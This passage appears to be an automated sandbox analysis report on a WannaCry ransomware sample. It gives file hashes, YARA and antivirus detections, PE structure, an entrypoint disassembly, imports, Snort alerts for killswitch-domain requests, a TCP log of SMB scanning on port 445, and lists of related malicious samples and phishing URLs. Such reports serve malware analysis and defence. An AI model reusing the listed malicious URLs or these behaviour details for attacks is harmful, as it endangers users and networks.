              • 104.17.244.81
              MTyz7SbF68.dllGet hashmaliciousBrowse
              • 104.17.244.81
              fjMkGgiDGv.dllGet hashmaliciousBrowse
              • 104.16.173.80
              bGmT7Wjbn1.dllGet hashmaliciousBrowse
              • 104.17.244.81
              101.bin.exeGet hashmaliciousBrowse
              • 104.16.173.80
              Win32.Wannacry.dllGet hashmaliciousBrowse
              • 104.17.244.81
              y2jb4FtSNq.dllGet hashmaliciousBrowse
              • 104.16.173.80
              HhDMZKWBi5.dllGet hashmaliciousBrowse
              • 104.17.244.81
              KzTwbZkCyW.dllGet hashmaliciousBrowse
              • 104.17.244.81
              mAgMRXeHnV.dllGet hashmaliciousBrowse
              • 104.17.244.81
              giXSx7co4Z.dllGet hashmaliciousBrowse
              • 104.17.244.81
              u25HmIWOKl.dllGet hashmaliciousBrowse
              • 104.17.244.81
              JnqM1TFtYi.dllGet hashmaliciousBrowse
              • 104.16.173.80
              7Qu8thR7WW.dllGet hashmaliciousBrowse
              • 104.17.244.81
              Kq8sxCCgnb.dllGet hashmaliciousBrowse
              • 104.17.244.81
              5hHHsExlwx.dllGet hashmaliciousBrowse
              • 104.17.244.81
              XHlAv3DhlB.dllGet hashmaliciousBrowse
              • 104.16.173.80
              IlpKomTIie.dllGet hashmaliciousBrowse
              • 104.17.244.81
              VzAh2pC8hQ.dllGet hashmaliciousBrowse
              • 104.16.173.80
              MSmReFKunQ.dllGet hashmaliciousBrowse
              • 104.16.173.80

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              WM-DATASEW9CVetN5r3.elfGet hashmaliciousBrowse
              • 164.9.153.250
              aD7q0VGVnM.elfGet hashmaliciousBrowse
              • 217.150.164.242
              YnsL6GLYlW.dllGet hashmaliciousBrowse
              • 164.9.174.63
              6LBI8wV2LuGet hashmaliciousBrowse
              • 164.9.241.249
              evnG82fdDsGet hashmaliciousBrowse
              • 83.174.66.109
              notabotnet.x86Get hashmaliciousBrowse
              • 83.174.66.106
              2rtU0YeO7lGet hashmaliciousBrowse
              • 164.9.241.205
              GPqF0RM2yAGet hashmaliciousBrowse
              • 164.9.104.6
              K74MviOR7dGet hashmaliciousBrowse
              • 164.9.65.235
              RSec.mpslGet hashmaliciousBrowse
              • 217.150.173.241
              zsrIbaaV98Get hashmaliciousBrowse
              • 83.174.66.109
              he7hRoAnnxGet hashmaliciousBrowse
              • 83.174.66.125
              iKuUJ0F8DuGet hashmaliciousBrowse
              • 164.9.224.4
              BXQb7BRQx7Get hashmaliciousBrowse
              • 83.174.66.118
              zFDNFIXYHnGet hashmaliciousBrowse
              • 83.174.87.202
              U9ZCIleOACGet hashmaliciousBrowse
              • 217.150.164.225
              MICROSOFT-CORP-MSN-AS-BLOCKUShttps://ddesllc2-my.sharepoint.com/:o:/g/personal/ckovalovsky_ddesllc_com/EinkBwuPSpNFq3OrorloAioBe5kznkxasTY4fgR94M4NkQ?e=5%3arVlnih&at=9Get hashmaliciousBrowse
              • 13.105.28.48
              https://netorgft7544696-my.sharepoint.com/:o:/g/personal/bryan_waverleygreens_com/Eh2RmDLZbvtEu-5WFJHDbJ0BQdAUvJBP9FXIjJwREUy40Q?e=5%3alnwhxG&at=9Get hashmaliciousBrowse
              • 52.104.95.55
              https://hmpgbtmls103975.weeblysite.com/Get hashmaliciousBrowse
              • 204.79.197.200
              https://puhsd210-my.sharepoint.com/:o:/g/personal/gomes_phoenixunion_org/EqAmXpu2ybJDkF0b3Rki3WsB7yVhF1HTy7OSqceDGIUfuQ?e=5%3agWLIUJ&at=9Get hashmaliciousBrowse
              • 13.107.136.8
              triper_Meeting_schedule_template.xlsmGet hashmaliciousBrowse
              • 13.107.6.171
              https://ruv80zbas1.execute-api.us-east-1.amazonaws.com/prod/jump?redirect_url=https://redirfit.top?e=Y2h1Y2suYnJhbmRlbEBpc2dpbmMuY29t&creative_id=1028&tag_name=seeAllVideos&operative_id=41521Get hashmaliciousBrowse
              • 104.43.141.159
              Purchase Order HB009 000009220304.htmGet hashmaliciousBrowse
              • 13.107.219.60
              http://dbf.org.in/pAGet hashmaliciousBrowse
              • 13.107.219.60
              http://dbf.org.in/pAGet hashmaliciousBrowse
              • 13.107.219.60
              DY8oMMJ6Ru.exeGet hashmaliciousBrowse
              • 20.126.95.155
              https://analyticalconsumables-my.sharepoint.com/:o:/g/personal/peter_hermans_analyticalconsumables_onmicrosoft_com/EiUw1SZmcnpIsJKM9QME60wBSCB6mqVVmSHteVl_jwlrew?e=nAWAzXGet hashmaliciousBrowse
              • 40.126.32.138
              DOC DPD _ 10TH_OCTOBER_2022 _.HTMLGet hashmaliciousBrowse
              • 13.107.227.45
              Delivery package.jsGet hashmaliciousBrowse
              • 23.101.205.83
              uuctgqafmcr.exeGet hashmaliciousBrowse
              • 104.47.56.110
              7jLUw8OOEn.exeGet hashmaliciousBrowse
              • 22.40.27.231
              upCVNgNwCr.dllGet hashmaliciousBrowse
              • 20.42.236.169
              tNTBg40iVN.exeGet hashmaliciousBrowse
              • 20.238.83.74
              N2wHyH6p2I.exeGet hashmaliciousBrowse
              • 40.110.107.26
              rRhN2d6O0L.exeGet hashmaliciousBrowse
              • 22.204.67.218
              49kcrJ5r6R.exeGet hashmaliciousBrowse
              • 22.220.94.65

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Windows\tasksche.exe

              Download File
              Process:C:\Users\user\Desktop\e0R5qxY8Vj.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):3514368
              Entropy (8bit):7.898585427870349
              Encrypted:false
              SSDEEP:98304:QqPoBU1aRxcSUDk36SAEdhvxWa9P593R8yAVp2Hj:QqPT1Cxcxk3ZAEUadzR8yc4Hj
              MD5:753B5844028FBC529C56ADCE1F2FF2C1
              SHA1:3EF1B35BC5EC02ADB7F87FBC4ABDF1146F578B7C
              SHA-256:ADF176FBC103224E03665925264D7388D8BCD406A3F61981E43B4732304957CF
              SHA-512:7893BB596552724151C578A67BA852998E9CA33E1F812506AE0163E479591865D245060C7D6CA1A6DDAE0DE049A3E91803599B9F9268A11F4105C4843B7F7FE1
              Malicious:true
              Yara Hits:
              • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (with the help of binar.ly)
              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team
              • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 93%
              Reputation:low
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T...T...T..X...T.._...T.'.Z...T..^...T..P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L...A..L.................p... 5......w............@...........................5.................................................d.........4..........................................................................................................text....i.......p.................. ..`.rdata..p_.......`..................@..@.data...X........ ..................@....rsrc.....4.......4.................@..@........................................................................................................................................................................................................................................................................................................................................................

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):7.851462616041201
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:e0R5qxY8Vj.exe
              File size:3723264
              MD5:b6aeab8b14c4279100d7f14b78dc4ec5
              SHA1:887fc185484327153b63d5d356fe3a5eaebf105c
              SHA256:26eebe4267523f0fd8e6ab6a857be45909cc88240e93549b6089921313dedf8e
              SHA512:02f032620b17637a584bc8b4e2e2f5ec584588f123ea24d53dbceaecf7665e996e9b658bdd6bf5eac0159de20299ee04922104d4fb9ac8eefd35bc364424aad0
              SSDEEP:98304:yDqPoBU1aRxcSUDk36SAEdhvxWa9P593R8yAVp2HI:yDqPT1Cxcxk3ZAEUadzR8yc4HI
              TLSH:A3063394526CB2BCF0540EB44073892BB7B73C6A97FA5F1F87C086AA0D53B5B6BD0641
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U<S..]=..]=..]=.jA1..]=..A3..]=.~B7..]=.~B6..]=.~B9..]=..R`..]=..]<.J]=.'{6..]=..[;..]=.Rich.]=.........................PE..L..

              File Icon

              Icon Hash:00828e8e8686b000

              Static PE Info

              General

              Entrypoint:0x409a16
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              DLL Characteristics:
              Time Stamp:0x4CE78ECC [Sat Nov 20 09:03:08 2010 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:9ecee117164e0b870a53dd187cdd7174

              Entrypoint Preview

              Instruction
              push ebp
              mov ebp, esp
              push FFFFFFFFh
              push 0040A1A0h
              push 00409BA2h
              mov eax, dword ptr fs:[00000000h]
              push eax
              mov dword ptr fs:[00000000h], esp
              sub esp, 68h
              push ebx
              push esi
              push edi
              mov dword ptr [ebp-18h], esp
              xor ebx, ebx
              mov dword ptr [ebp-04h], ebx
              push 00000002h
              call dword ptr [0040A0C0h]
              pop ecx
              or dword ptr [0070F894h], FFFFFFFFh
              or dword ptr [0070F898h], FFFFFFFFh
              call dword ptr [0040A0C8h]
              mov ecx, dword ptr [0070F88Ch]
              mov dword ptr [eax], ecx
              call dword ptr [0040A0CCh]
              mov ecx, dword ptr [0070F888h]
              mov dword ptr [eax], ecx
              mov eax, dword ptr [0040A0E4h]
              mov eax, dword ptr [eax]
              mov dword ptr [0070F890h], eax
              call 00007F5924DBFB01h
              cmp dword ptr [00431410h], ebx
              jne 00007F5924DBF9EEh
              push 00409B9Eh
              call dword ptr [0040A0D4h]
              pop ecx
              call 00007F5924DBFAD3h
              push 0040B010h
              push 0040B00Ch
              call 00007F5924DBFABEh
              mov eax, dword ptr [0070F884h]
              mov dword ptr [ebp-6Ch], eax
              lea eax, dword ptr [ebp-6Ch]
              push eax
              push dword ptr [0070F880h]
              lea eax, dword ptr [ebp-64h]
              push eax
              lea eax, dword ptr [ebp-70h]
              push eax
              lea eax, dword ptr [ebp-60h]
              push eax
              call dword ptr [0040A0DCh]
              push 0040B008h
              push 0040B000h
              call 00007F5924DBFA8Bh

              Rich Headers

              Programming Language:
              • [C++] VS98 (6.0) SP6 build 8804
              • [EXP] VC++ 6.0 SP5 build 8804

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0xa1e00xa0.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x3100000x35a454.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0xa0000x188.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x8bca0x9000False0.534423828125data6.1345234015658825IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0xa0000x9980x1000False0.29345703125data3.503615586181224IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0xb0000x30489c0x27000unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x3100000x35a4540x35b000unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountry
              R0x3100a40x35a000PE32 executable (GUI) Intel 80386, for MS WindowsEnglishUnited States
              RT_VERSION0x66a0a40x3b0dataEnglishUnited States

              Imports

              DLLImport
              KERNEL32.dllWaitForSingleObject, InterlockedIncrement, GetCurrentThreadId, GetCurrentThread, ReadFile, GetFileSize, CreateFileA, MoveFileExA, SizeofResource, TerminateThread, LoadResource, FindResourceA, GetProcAddress, GetModuleHandleW, ExitProcess, GetModuleFileNameA, LocalFree, LocalAlloc, CloseHandle, InterlockedDecrement, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, GlobalAlloc, GlobalFree, QueryPerformanceFrequency, QueryPerformanceCounter, GetTickCount, LockResource, Sleep, GetStartupInfoA, GetModuleHandleA
              ADVAPI32.dllStartServiceCtrlDispatcherA, RegisterServiceCtrlHandlerA, ChangeServiceConfig2A, SetServiceStatus, OpenSCManagerA, CreateServiceA, CloseServiceHandle, StartServiceA, CryptGenRandom, CryptAcquireContextA, OpenServiceA
              WS2_32.dllclosesocket, recv, send, htonl, ntohl, WSAStartup, inet_ntoa, ioctlsocket, select, htons, socket, connect, inet_addr
              MSVCP60.dll??1_Lockit@std@@QAE@XZ, ??0_Lockit@std@@QAE@XZ
              iphlpapi.dllGetAdaptersInfo, GetPerAdapterInfo
              WININET.dllInternetOpenA, InternetOpenUrlA, InternetCloseHandle
              MSVCRT.dll__set_app_type, _stricmp, __p__fmode, __p__commode, _except_handler3, __setusermatherr, _initterm, __getmainargs, _acmdln, _adjust_fdiv, _controlfp, exit, _XcptFilter, _exit, _onexit, __dllonexit, free, ??2@YAPAXI@Z, _ftol, sprintf, _endthreadex, strncpy, rand, _beginthreadex, __CxxFrameHandler, srand, time, __p___argc

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              Snort IDS Alerts

              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              192.168.2.58.8.8.860841532024291 10/10/22-17:16:06.050133UDP2024291ET TROJAN Possible WannaCry DNS Lookup 16084153192.168.2.58.8.8.8
              192.168.2.5104.17.244.8149699802024298 10/10/22-17:16:06.148980TCP2024298ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 14969980192.168.2.5104.17.244.81
              192.168.2.58.8.8.850295532024291 10/10/22-17:16:04.811422UDP2024291ET TROJAN Possible WannaCry DNS Lookup 15029553192.168.2.58.8.8.8
              104.16.173.80192.168.2.580496982031515 10/10/22-17:16:05.010911TCP2031515ET TROJAN Known Sinkhole Response Kryptos Logic8049698104.16.173.80192.168.2.5
              104.17.244.81192.168.2.580496992031515 10/10/22-17:16:06.200511TCP2031515ET TROJAN Known Sinkhole Response Kryptos Logic8049699104.17.244.81192.168.2.5
              192.168.2.5104.16.173.8049698802024298 10/10/22-17:16:04.949392TCP2024298ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 14969880192.168.2.5104.16.173.80

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Oct 10, 2022 17:16:00.890773058 CEST49693443192.168.2.5131.253.33.200
              Oct 10, 2022 17:16:00.890979052 CEST49693443192.168.2.5131.253.33.200
              Oct 10, 2022 17:16:00.891047955 CEST49693443192.168.2.5131.253.33.200
              Oct 10, 2022 17:16:00.891091108 CEST49693443192.168.2.5131.253.33.200
              Oct 10, 2022 17:16:00.891127110 CEST49693443192.168.2.5131.253.33.200
              Oct 10, 2022 17:16:00.891170025 CEST49693443192.168.2.5131.253.33.200
              Oct 10, 2022 17:16:00.891170025 CEST49693443192.168.2.5131.253.33.200
              Oct 10, 2022 17:16:00.891213894 CEST49693443192.168.2.5131.253.33.200
              Oct 10, 2022 17:16:00.891213894 CEST49693443192.168.2.5131.253.33.200
              Oct 10, 2022 17:16:00.891233921 CEST49693443192.168.2.5131.253.33.200
              Oct 10, 2022 17:16:00.915443897 CEST44349693131.253.33.200192.168.2.5
              Oct 10, 2022 17:16:00.915503979 CEST44349693131.253.33.200192.168.2.5
              Oct 10, 2022 17:16:00.915517092 CEST44349693131.253.33.200192.168.2.5
              Oct 10, 2022 17:16:00.915524960 CEST44349693131.253.33.200192.168.2.5
              Oct 10, 2022 17:16:00.915599108 CEST44349693131.253.33.200192.168.2.5
              Oct 10, 2022 17:16:00.915649891 CEST44349693131.253.33.200192.168.2.5
              Oct 10, 2022 17:16:00.915817976 CEST44349693131.253.33.200192.168.2.5
              Oct 10, 2022 17:16:00.915847063 CEST44349693131.253.33.200192.168.2.5
              Oct 10, 2022 17:16:00.915971041 CEST44349693131.253.33.200192.168.2.5
              Oct 10, 2022 17:16:00.916016102 CEST44349693131.253.33.200192.168.2.5
              Oct 10, 2022 17:16:00.916048050 CEST44349693131.253.33.200192.168.2.5
              Oct 10, 2022 17:16:00.916207075 CEST44349693131.253.33.200192.168.2.5
              Oct 10, 2022 17:16:00.916224003 CEST44349693131.253.33.200192.168.2.5
              Oct 10, 2022 17:16:00.916315079 CEST44349693131.253.33.200192.168.2.5
              Oct 10, 2022 17:16:00.916419983 CEST44349693131.253.33.200192.168.2.5
              Oct 10, 2022 17:16:00.916435957 CEST44349693131.253.33.200192.168.2.5
              Oct 10, 2022 17:16:00.916450024 CEST44349693131.253.33.200192.168.2.5
              Oct 10, 2022 17:16:00.916537046 CEST44349693131.253.33.200192.168.2.5
              Oct 10, 2022 17:16:00.916574001 CEST44349693131.253.33.200192.168.2.5
              Oct 10, 2022 17:16:00.916573048 CEST49693443192.168.2.5131.253.33.200
              Oct 10, 2022 17:16:00.916618109 CEST49693443192.168.2.5131.253.33.200
              Oct 10, 2022 17:16:00.916709900 CEST44349693131.253.33.200192.168.2.5
              Oct 10, 2022 17:16:00.916728020 CEST44349693131.253.33.200192.168.2.5
              Oct 10, 2022 17:16:00.916897058 CEST44349693131.253.33.200192.168.2.5
              Oct 10, 2022 17:16:00.916912079 CEST44349693131.253.33.200192.168.2.5
              Oct 10, 2022 17:16:00.917062044 CEST44349693131.253.33.200192.168.2.5
              Oct 10, 2022 17:16:00.970319033 CEST44349693131.253.33.200192.168.2.5
              Oct 10, 2022 17:16:00.974570036 CEST49693443192.168.2.5131.253.33.200
              Oct 10, 2022 17:16:04.925939083 CEST4969880192.168.2.5104.16.173.80
              Oct 10, 2022 17:16:04.946702957 CEST8049698104.16.173.80192.168.2.5
              Oct 10, 2022 17:16:04.947210073 CEST4969880192.168.2.5104.16.173.80
              Oct 10, 2022 17:16:04.949392080 CEST4969880192.168.2.5104.16.173.80
              Oct 10, 2022 17:16:04.966516972 CEST8049698104.16.173.80192.168.2.5
              Oct 10, 2022 17:16:05.010910988 CEST8049698104.16.173.80192.168.2.5
              Oct 10, 2022 17:16:05.013036013 CEST4969880192.168.2.5104.16.173.80
              Oct 10, 2022 17:16:05.014872074 CEST4969880192.168.2.5104.16.173.80
              Oct 10, 2022 17:16:05.034787893 CEST8049698104.16.173.80192.168.2.5
              Oct 10, 2022 17:16:05.240932941 CEST8049698104.16.173.80192.168.2.5
              Oct 10, 2022 17:16:05.241115093 CEST4969880192.168.2.5104.16.173.80
              Oct 10, 2022 17:16:06.129208088 CEST4969980192.168.2.5104.17.244.81
              Oct 10, 2022 17:16:06.146152973 CEST8049699104.17.244.81192.168.2.5
              Oct 10, 2022 17:16:06.146356106 CEST4969980192.168.2.5104.17.244.81
              Oct 10, 2022 17:16:06.148979902 CEST4969980192.168.2.5104.17.244.81
              Oct 10, 2022 17:16:06.165971994 CEST8049699104.17.244.81192.168.2.5
              Oct 10, 2022 17:16:06.200510979 CEST8049699104.17.244.81192.168.2.5
              Oct 10, 2022 17:16:06.200582027 CEST8049699104.17.244.81192.168.2.5
              Oct 10, 2022 17:16:06.200716019 CEST4969980192.168.2.5104.17.244.81
              Oct 10, 2022 17:16:06.200762033 CEST4969980192.168.2.5104.17.244.81
              Oct 10, 2022 17:16:06.205557108 CEST4969980192.168.2.5104.17.244.81
              Oct 10, 2022 17:16:06.222496986 CEST8049699104.17.244.81192.168.2.5
              Oct 10, 2022 17:16:06.240432024 CEST49700445192.168.2.5175.112.244.176
              Oct 10, 2022 17:16:07.365463018 CEST49714445192.168.2.5181.2.240.55
              Oct 10, 2022 17:16:08.248473883 CEST49723445192.168.2.563.57.242.79
              Oct 10, 2022 17:16:08.506344080 CEST49725445192.168.2.5115.13.213.249
              Oct 10, 2022 17:16:09.377768993 CEST49734445192.168.2.541.118.158.119
              Oct 10, 2022 17:16:09.631114006 CEST49737445192.168.2.557.136.174.144
              Oct 10, 2022 17:16:10.279273987 CEST49748445192.168.2.525.139.62.176
              Oct 10, 2022 17:16:10.490076065 CEST49751445192.168.2.5166.230.136.54
              Oct 10, 2022 17:16:10.739794970 CEST49753445192.168.2.513.96.109.54
              Oct 10, 2022 17:16:11.630736113 CEST49765445192.168.2.5184.137.195.142
              Oct 10, 2022 17:16:11.867162943 CEST49768445192.168.2.535.164.16.73
              Oct 10, 2022 17:16:12.292583942 CEST49775445192.168.2.5171.59.166.143
              Oct 10, 2022 17:16:12.506710052 CEST49779445192.168.2.534.13.244.254
              Oct 10, 2022 17:16:12.741775990 CEST49780445192.168.2.5168.135.117.110
              Oct 10, 2022 17:16:12.974407911 CEST49784445192.168.2.5173.17.34.177
              Oct 10, 2022 17:16:13.427782059 CEST49791445192.168.2.5177.190.13.142
              Oct 10, 2022 17:16:13.615562916 CEST49794445192.168.2.567.48.71.38
              Oct 10, 2022 17:16:13.808870077 CEST4454979467.48.71.38192.168.2.5
              Oct 10, 2022 17:16:13.865226984 CEST49796445192.168.2.576.121.148.49
              Oct 10, 2022 17:16:14.092536926 CEST49800445192.168.2.5159.41.171.215
              Oct 10, 2022 17:16:14.305392027 CEST49804445192.168.2.5142.206.89.123
              Oct 10, 2022 17:16:14.317576885 CEST49794445192.168.2.567.48.71.38
              Oct 10, 2022 17:16:14.509380102 CEST4454979467.48.71.38192.168.2.5
              Oct 10, 2022 17:16:14.552978992 CEST49808445192.168.2.5154.180.102.251
              Oct 10, 2022 17:16:14.740746975 CEST49810445192.168.2.582.232.183.103
              Oct 10, 2022 17:16:14.976315022 CEST49813445192.168.2.5169.45.38.102
              Oct 10, 2022 17:16:15.209388971 CEST49817445192.168.2.532.189.3.54
              Oct 10, 2022 17:16:15.412664890 CEST49820445192.168.2.544.124.225.93
              Oct 10, 2022 17:16:15.662415028 CEST49825445192.168.2.57.52.92.69
              Oct 10, 2022 17:16:15.849766016 CEST49826445192.168.2.519.41.93.173
              Oct 10, 2022 17:16:16.085892916 CEST49830445192.168.2.541.243.241.102
              Oct 10, 2022 17:16:16.322309971 CEST49834445192.168.2.577.205.11.30
              Oct 10, 2022 17:16:16.334834099 CEST49835445192.168.2.5170.96.121.127
              Oct 10, 2022 17:16:16.538517952 CEST49838445192.168.2.519.41.229.6
              Oct 10, 2022 17:16:16.772612095 CEST49842445192.168.2.5110.230.56.50
              Oct 10, 2022 17:16:16.976758957 CEST49843445192.168.2.5191.22.31.208
              Oct 10, 2022 17:16:17.211100101 CEST49848445192.168.2.520.144.253.79
              Oct 10, 2022 17:16:17.516146898 CEST49852445192.168.2.5194.87.28.190
              Oct 10, 2022 17:16:17.516434908 CEST49853445192.168.2.5212.101.226.163
              Oct 10, 2022 17:16:17.952109098 CEST49855445192.168.2.5189.163.61.3
              Oct 10, 2022 17:16:18.073029041 CEST49857445192.168.2.558.232.18.64
              Oct 10, 2022 17:16:18.104948997 CEST49859445192.168.2.52.152.234.8
              Oct 10, 2022 17:16:18.386462927 CEST49862445192.168.2.5206.232.197.121
              Oct 10, 2022 17:16:18.398334026 CEST49864445192.168.2.548.72.23.14
              Oct 10, 2022 17:16:19.129345894 CEST49867445192.168.2.5197.238.58.145
              Oct 10, 2022 17:16:19.129622936 CEST49868445192.168.2.5113.218.2.157
              Oct 10, 2022 17:16:19.240782976 CEST49871445192.168.2.5128.232.114.9
              Oct 10, 2022 17:16:19.241400003 CEST49872445192.168.2.5165.78.160.252
              Oct 10, 2022 17:16:19.241975069 CEST49873445192.168.2.5115.227.181.228
              Oct 10, 2022 17:16:19.522629976 CEST49878445192.168.2.5175.192.102.194
              Oct 10, 2022 17:16:19.523947001 CEST49877445192.168.2.544.230.65.11
              Oct 10, 2022 17:16:20.738305092 CEST49882445192.168.2.578.235.109.132
              Oct 10, 2022 17:16:20.940591097 CEST49883445192.168.2.5119.6.137.161
              Oct 10, 2022 17:16:20.941163063 CEST49884445192.168.2.5169.200.198.118
              Oct 10, 2022 17:16:20.941917896 CEST49885445192.168.2.512.125.55.174
              Oct 10, 2022 17:16:20.942624092 CEST49886445192.168.2.569.173.139.62
              Oct 10, 2022 17:16:20.943495035 CEST49887445192.168.2.564.76.90.50
              Oct 10, 2022 17:16:20.944197893 CEST49888445192.168.2.5134.7.103.75
              Oct 10, 2022 17:16:20.944991112 CEST49889445192.168.2.578.170.95.188
              Oct 10, 2022 17:16:21.119635105 CEST4454988512.125.55.174192.168.2.5
              Oct 10, 2022 17:16:21.630762100 CEST49885445192.168.2.512.125.55.174
              Oct 10, 2022 17:16:21.808599949 CEST4454988512.125.55.174192.168.2.5
              Oct 10, 2022 17:16:21.849842072 CEST49901445192.168.2.54.133.216.216
              Oct 10, 2022 17:16:22.055694103 CEST49902445192.168.2.5162.140.100.208
              Oct 10, 2022 17:16:22.055766106 CEST49903445192.168.2.5111.121.27.111
              Oct 10, 2022 17:16:22.055937052 CEST49904445192.168.2.5220.44.168.152
              Oct 10, 2022 17:16:22.056018114 CEST49906445192.168.2.5152.29.172.254
              Oct 10, 2022 17:16:22.056066036 CEST49905445192.168.2.5212.9.9.65
              Oct 10, 2022 17:16:22.056174994 CEST49907445192.168.2.5125.62.186.206
              Oct 10, 2022 17:16:22.056221962 CEST49908445192.168.2.5180.37.64.118
              Oct 10, 2022 17:16:22.741959095 CEST49919445192.168.2.525.48.241.16
              Oct 10, 2022 17:16:22.959487915 CEST49921445192.168.2.591.160.158.95
              Oct 10, 2022 17:16:23.164514065 CEST49923445192.168.2.594.6.199.161
              Oct 10, 2022 17:16:23.164524078 CEST49924445192.168.2.5161.166.55.79
              Oct 10, 2022 17:16:23.164607048 CEST49925445192.168.2.546.136.100.58
              Oct 10, 2022 17:16:23.164628029 CEST49926445192.168.2.5186.63.45.63
              Oct 10, 2022 17:16:23.164680004 CEST49927445192.168.2.5189.59.213.169
              Oct 10, 2022 17:16:23.164706945 CEST49928445192.168.2.5125.47.230.140
              Oct 10, 2022 17:16:23.164736032 CEST49929445192.168.2.5218.212.157.212
              Oct 10, 2022 17:16:23.850624084 CEST49939445192.168.2.5171.86.238.76
              Oct 10, 2022 17:16:24.068810940 CEST49941445192.168.2.5208.72.40.13
              Oct 10, 2022 17:16:24.288326979 CEST49944445192.168.2.5177.171.140.221
              Oct 10, 2022 17:16:24.288783073 CEST49945445192.168.2.577.61.188.27
              Oct 10, 2022 17:16:24.289370060 CEST49946445192.168.2.5157.209.198.122
              Oct 10, 2022 17:16:24.289921999 CEST49947445192.168.2.5187.5.254.121
              Oct 10, 2022 17:16:24.290461063 CEST49948445192.168.2.530.253.159.227
              Oct 10, 2022 17:16:24.291059017 CEST49949445192.168.2.5191.188.227.142
              Oct 10, 2022 17:16:24.291711092 CEST49950445192.168.2.5140.122.152.90
              Oct 10, 2022 17:16:24.761939049 CEST49958445192.168.2.577.122.222.21
              Oct 10, 2022 17:16:24.975266933 CEST49961445192.168.2.5106.107.141.229
              Oct 10, 2022 17:16:25.194410086 CEST49962445192.168.2.5151.161.69.52
              Oct 10, 2022 17:16:25.414194107 CEST49966445192.168.2.5181.235.74.152
              Oct 10, 2022 17:16:25.414551020 CEST49967445192.168.2.5213.61.80.71
              Oct 10, 2022 17:16:25.415393114 CEST49968445192.168.2.5103.37.28.192
              Oct 10, 2022 17:16:25.416090012 CEST49969445192.168.2.5114.139.50.139
              Oct 10, 2022 17:16:25.416879892 CEST49970445192.168.2.5171.186.101.53
              Oct 10, 2022 17:16:25.417738914 CEST49971445192.168.2.577.139.112.142
              Oct 10, 2022 17:16:25.418435097 CEST49972445192.168.2.536.186.236.0
              Oct 10, 2022 17:16:25.435606003 CEST44549967213.61.80.71192.168.2.5
              Oct 10, 2022 17:16:25.520204067 CEST4454997177.139.112.142192.168.2.5
              Oct 10, 2022 17:16:25.865803003 CEST49980445192.168.2.5219.136.154.167
              Oct 10, 2022 17:16:26.021784067 CEST49967445192.168.2.5213.61.80.71
              Oct 10, 2022 17:16:26.022934914 CEST49971445192.168.2.577.139.112.142
              Oct 10, 2022 17:16:26.043030024 CEST44549967213.61.80.71192.168.2.5
              Oct 10, 2022 17:16:26.085370064 CEST49982445192.168.2.544.110.151.146
              Oct 10, 2022 17:16:26.126341105 CEST4454997177.139.112.142192.168.2.5
              Oct 10, 2022 17:16:26.303700924 CEST49983445192.168.2.5106.156.18.179
